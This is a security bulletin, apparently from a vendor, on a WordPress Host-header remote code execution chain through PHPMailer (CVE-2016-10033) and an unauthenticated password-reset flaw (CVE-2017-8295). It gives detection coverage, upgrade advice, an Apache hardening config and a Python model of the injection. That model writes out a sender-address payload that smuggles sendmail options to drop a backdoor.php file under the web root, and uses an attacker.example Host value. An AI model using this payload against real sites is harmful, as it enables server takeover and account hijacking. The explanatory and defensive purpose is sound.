
05/08/17: WordPress Host Header RCE (via CVE-2016-10033) and Password Reset (CVE-2017-8295) Exploits | Security Bulletin

Overview

Proof-of-concept exploits have been published for two vulnerabilities in WordPress, a popular open-source Content Management System written in PHP and backed by a MySQL database.

  • Host Header RCE: ExploitBox has published a proof-of-concept exploit for a vulnerability in WordPress core (4.6 and earlier). WordPress builds the default sender address of outgoing e-mail from SERVER_NAME, which on a default web server configuration is taken from the HTTP Host header, so an unauthenticated attacker can inject a crafted value into the address that WordPress hands to PHPMailer, the mail library bundled with WordPress core. That value then triggers CVE-2016-10033 in PHPMailer, which passes the sender address to the local Mail Transfer Agent on its command line without adequate escaping; the attacker can inject additional MTA options and ultimately execute their own code on the server, taking control of the victim's website.

    More information about this exploit is available from ExploitBox here: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html

  • CVE-2017-8295: ExploitBox has published a proof-of-concept for an unauthenticated password-reset vulnerability in WordPress (up to and including 4.7.4). The password reset e-mail's From address, and with it the Return-Path, is built from SERVER_NAME, which again defaults to the HTTP Host header. An attacker who requests a reset for a victim's account while supplying a Host header that names a domain they control can, if the victim's mailbox bounces or auto-replies, receive a copy of the reset link without any prior authentication. This is a targeted attack against a specific account that gives the attacker unauthorized access to the victim's WordPress account.

    More information about this exploit is available from ExploitBox here: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
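The chain behind both issues, as an added example that is not code from WordPress, PHPMailer, ExploitBox or Alert Logic: the Python model below reproduces the one step the two vulnerabilities share, that WordPress derives the mail sender address from SERVER_NAME (and so from the Host header), and then follows that sender through PHP's escapeshellcmd() and the shell into sendmail's argument vector, which is the CVE-2016-10033 step. The sender payload has the shape of the generic PHPMailer proof of concept (a quoted local part whose escaped quote pairs with the opening one); the WordPress-specific exploit on ExploitBox uses a shape that survives the web server's Host header parsing, which is not modelled here. The hostnames, paths and the allow-list pattern are assumptions for illustration.

```python
"""Model of the WordPress -> PHPMailer -> sendmail chain behind both issues.
Added example, not code from WordPress, PHPMailer or Alert Logic; the sender
payload is the generic PHPMailer CVE-2016-10033 proof-of-concept shape."""
import re
import shlex

# Characters PHP's escapeshellcmd() backslash-escapes unconditionally.
SHELL_META = set('#&;`|*?~<>^()[]{}$\\\n\xff')


def wordpress_sender_from_host(server_name: str) -> str:
    """wp_mail() builds the default From address from $_SERVER['SERVER_NAME'].
    With Apache's default UseCanonicalName Off that value is the request's
    Host header, so an unauthenticated client chooses the sender domain."""
    sitename = server_name.lower()
    if sitename.startswith('www.'):
        sitename = sitename[4:]
    return 'wordpress@' + sitename


def php_escapeshellcmd(s: str) -> str:
    """Emulate escapeshellcmd(): escape shell metacharacters, and escape a quote
    only when it has no later partner. PHP's mail() applies this to the extra
    parameters, which is why a *paired* quote survives into the command line."""
    out = []
    open_quote = None
    for i, ch in enumerate(s):
        if ch in ('"', "'"):
            if open_quote is None and s.find(ch, i + 1) != -1:
                open_quote = ch          # opening quote with a partner: kept
            elif open_quote == ch:
                open_quote = None        # its closing partner: kept
            else:
                out.append('\\')         # unpaired quote: escaped
            out.append(ch)
        elif ch in SHELL_META:
            out.append('\\' + ch)
        else:
            out.append(ch)
    return ''.join(out)


def sendmail_argv(sender: str, sendmail_path: str = '/usr/sbin/sendmail -t -i') -> list:
    """What the MTA actually receives. PHPMailer sets the envelope sender with
    -f<sender>; PHP's mail() escapes it and then popen()s the whole string,
    i.e. /bin/sh -c re-tokenises it. shlex.split models the POSIX shell."""
    return shlex.split(sendmail_path + ' ' + php_escapeshellcmd('-f' + sender))


# Allow-list in the spirit of the PHPMailer 5.2.20 fix (assumed pattern): rather
# than escaping, refuse any -f value containing characters the shell might parse.
SAFE_SENDER = re.compile(r'[A-Za-z0-9@._+-]+')


def safe_sendmail_argv(sender: str) -> list:
    """Hardened form: validate the sender against an allow-list before it gets
    anywhere near a command line; a rejected sender is an error, not an escape."""
    if not SAFE_SENDER.fullmatch(sender):
        raise ValueError('sender contains shell-unsafe characters: %r' % sender)
    return sendmail_argv(sender)


if __name__ == '__main__':
    # Constructed inputs. A normal request carries the site's own hostname.
    print(sendmail_argv(wordpress_sender_from_host('www.Blog.example.com')))
    # CVE-2017-8295 shape: a Host header naming an attacker-controlled domain
    # turns the password-reset mail's sender into wordpress@attacker.example,
    # so bounces and auto-replies (quoting the reset link) go to the attacker.
    print(wordpress_sender_from_host('attacker.example'))
    # CVE-2016-10033 shape: an RFC 5322-valid quoted local part whose escaped
    # quote pairs with the opening one, so the shell splits it into extra
    # sendmail options (-oQ queue directory, -X log file under the web root).
    payload = '"attacker\\" -oQ/tmp/ -X/var/www/html/backdoor.php  x"@example.com'
    print(sendmail_argv(payload))
    try:
        safe_sendmail_argv(payload)
    except ValueError as e:
        print('rejected:', e)
```

Run it as a script to see the benign argument vector next to the injected one: the payload's escaped quote survives escapeshellcmd() because it has a partner, the shell then closes the quoted string early, and -oQ and -X arrive at sendmail as separate options. The allow-list refuses the same value outright, which is the property a fixed PHPMailer (5.2.20 or later) provides and a current WordPress core upgrade delivers.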

Alert Logic Coverage

Alert Logic has evaluated its customer base for exposure to these exploits and has developed signatures for detecting the threat, depending on the security service in place. We are continuing to refine our detection capabilities, and updates may be posted to this article in the future.

To keep up to date with coverage information for this threat, click Sign In at the top of this page and sign in to Help Center using your credentials for the Alert Logic UI. Then click Follow at the top, right corner of this article. By following the article, you will receive email alerts when the content of the article is updated.

Host Header RCE

Cloud Defender

  • For customers using Alert Logic out-of-band (OOB) Web Security Manager, a new header validation signature to detect the exploit has been added to security policies.

  • For customers using Alert Logic inline Web Security Manager, a new header validation signature to detect and block the exploit has been added to security policies. This attack is blocked even when the WAF is in detect mode.

  • The Network-based Intrusion Detection System (IDS) has been updated with new signatures for this exploit. These signatures are actively being assessed by our Security Operations Center (SOC) team for consideration of incident generation.

  • Vulnerability scanning has been updated to identify this vulnerability. To check your environment for this vulnerability, schedule a scan in the Alert Logic user interface (UI).

Threat Manager

  • The Network-based IDS has been updated with new signatures for this exploit. These signatures are actively being assessed by our SOC team for consideration of incident generation.

  • Vulnerability scanning has been updated to identify this vulnerability. To check your environment for this vulnerability, schedule a scan in the Alert Logic UI.

Recommendations 

  1. If you are running WordPress version 4.6 or earlier, upgrade to WordPress 4.7.4 (or at a minimum to 4.7).

  2. Make sure the PHPMailer copy bundled with WordPress (wp-includes/class-phpmailer.php) is a fixed release. PHPMailer 5.2.18 addressed CVE-2016-10033, but that fix was bypassed (CVE-2016-10045) and closed in 5.2.20, so 5.2.20 or later is required. Upgrading WordPress core replaces the bundled library; replace it by hand only if you cannot upgrade core.

  3. Follow this article and watch the Alert Logic blog for further updates.

CVE-2017-8295

Cloud Defender

  • For customers using Alert Logic inline Web Security Manager Premier, the request is blocked, because the WAF routes requests by virtual host name and a request whose Host header does not match any configured website is rejected.

    Note: The only exception to this blocking is if one of your website security profiles is configured with a proxy/website that handles requests for unknown host names; in that case requests carrying an unknown host name are not blocked.

Recommendations

  1. If you are running WordPress version 4.6 or earlier, upgrade to WordPress 4.7.4 (or at a minimum to 4.7). Note that 4.7.4 does not fix CVE-2017-8295, which affects all releases up to and including 4.7.4, so the SERVER_NAME mitigation in step 2 is the effective control until a fix ships.

  2. On Apache, set UseCanonicalName On together with an explicit ServerName in the WordPress virtual host, so that SERVER_NAME (and therefore the sender address of the reset e-mail) is a fixed value rather than whatever the client sends in the Host header. Ideally also make a non-WordPress virtual host the default, so that requests with unknown host names never reach WordPress.

  3. Follow this article and watch the Alert Logic blog for further updates.
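Added example of the SERVER_NAME mitigation for Apache 2.4 (this is not configuration from the bulletin, from Alert Logic or from WordPress; the hostnames and paths are assumed):

```apache
# Added example, not from the bulletin or WordPress: pin SERVER_NAME so that
# wp_mail() cannot be steered by the client's Host header.
# Assumes the site is blog.example.com, Apache 2.4 (Require syntax), and that
# the same two vhosts are repeated for *:443 if TLS is terminated here.

# 1. A catch-all vhost listed FIRST: for name-based hosting the first vhost is
#    the default, so a request with an unknown or attacker-chosen Host header
#    is answered here (403) and never reaches WordPress.
<VirtualHost *:80>
    ServerName default.invalid
    DocumentRoot /var/www/empty
    <Directory /var/www/empty>
        Require all denied
    </Directory>
</VirtualHost>

# 2. The WordPress vhost. With UseCanonicalName On, SERVER_NAME and
#    self-referential URLs are taken from ServerName, not from the request.
<VirtualHost *:80>
    ServerName blog.example.com
    ServerAlias www.blog.example.com
    UseCanonicalName On
    DocumentRoot /var/www/wordpress
</VirtualHost>
```

Check the result with apachectl -S, which lists the default and named virtual hosts as Apache parsed them, and with a request that spoofs the Host header (for example curl -sI -H 'Host: attacker.example' http://127.0.0.1/wp-login.php?action=lostpassword), which should now be answered by the catch-all vhost rather than by WordPress. On nginx the shipped fastcgi_params already passes $server_name as SERVER_NAME, so the equivalent is an explicit server_name on the WordPress server block plus a default_server block that does not serve WordPress.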

Contacting Alert Logic

If you have questions about Alert Logic coverage for these threats, contact our Support team using the following contact information.

US: 877.484.8383 (Option 2)

UK: +44 (0) 203 011 5533 (Option 2)

support@alertlogic.com

 
